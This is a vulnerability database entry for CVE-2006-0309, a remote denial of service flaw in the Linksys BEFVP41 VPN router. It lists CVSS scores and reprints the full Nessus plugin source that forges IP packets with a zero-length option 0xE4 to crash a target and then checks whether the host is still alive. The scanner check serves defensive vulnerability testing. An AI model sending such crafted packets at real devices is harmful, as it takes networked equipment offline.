Vulnerabilities > CVE-2006-0309 - Remote Denial Of Service vulnerability in Linksys Befvp41 1.01.04

047910
CVSS 4.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
linksys
nessus

Summary

Linksys BEFVP41 VPN Router 2.0 with firmware 1.01.04 allows remote attackers on the local network, to cause a denial of service via IP packets with a null IP option length.

Vulnerable Configurations

Part Description Count
Hardware
Linksys
1

Nessus

NASL familyDenial of Service
NASL id3COM_RAS_CRASH.NASL
descriptionIt was possible to crash the remote host by sending a specially crafted IP packet with a null length for IP option #0xE4 An attacker may use this flaw to prevent the remote host from accomplishing its job properly.
last seen2020-06-01
modified2020-06-02
plugin id11475
published2003-03-25
reporterThis script is Copyright (C) 2003-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11475
title3com RAS 1500 / Wyse Winterm Malformed Packet Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#
# THIS SCRIPT WAS NOT TESTED !
# (will only work with Nessus >= 2.0.2 though, because of a bug in insert_ip_option())
#
# Ref:
#
# Date: Mon, 24 Mar 2003 16:56:21 +0100 (CET)
# From: Piotr Chytla <[email protected]>
# Reply-To: iSEC Security Research <[email protected]>
# To: [email protected], <[email protected]>
#
# Josh Zlatin-Amishav has also discovered that this affects
# Wyse Winterm 1125SE thin client devices:
#    http://www.securityfocus.com/archive/1/407903/30/0/threaded

include("compat.inc");

if (description)
{
 script_id(11475);
 script_version("1.21");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-2005-2577", "CVE-2006-0309");
 script_bugtraq_id(7175, 14536);

 script_name(english:"3com RAS 1500 / Wyse Winterm Malformed Packet Remote DoS");
 script_summary(english:"Crashes a 3com_RAS_1500");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a remote denial of service attack.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote host by sending a specially
crafted IP packet with a null length for IP option #0xE4

An attacker may use this flaw to prevent the remote host from
accomplishing its job properly.");

 script_set_attribute(attribute:"see_also", value:"http://archive.cert.uni-stuttgart.de/bugtraq/2003/03/msg00321.html");

 script_set_attribute(attribute:"solution", value:"The solution is unknown at this time.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2003/03/24");
 script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/25");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);

 script_copyright(english:"This script is Copyright (C) 2003-2019 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 script_require_keys("Settings/ParanoidReport");
 exit(0);
}

include("audit.inc");
include("global_settings.inc");

  if ( TARGET_IS_IPV6 ) exit(0);
  if (report_paranoia < 2) audit(AUDIT_PARANOID);
  start_denial();

  ip = forge_ip_packet(ip_hl: 5, ip_v : 4, ip_tos : 0,
  ip_len : 44, ip_id:1234, ip_off : 0,
  ip_ttl : 0xff, ip_p:0xAA,
  ip_src : compat::this_host());

  ipo = insert_ip_options(ip:ip, code:0xE4, length:0, value:raw_string(0x00, 0x00));
  ipo += string("ABCDEFGHIJKLMNOPRSTU");
  send_packet(ipo, pcap_active:FALSE) x 10;
  sleep(5);
  alive = end_denial();
  if(!alive){
    security_hole(0);
    set_kb_item(name:"Host/dead", value:TRUE);
  }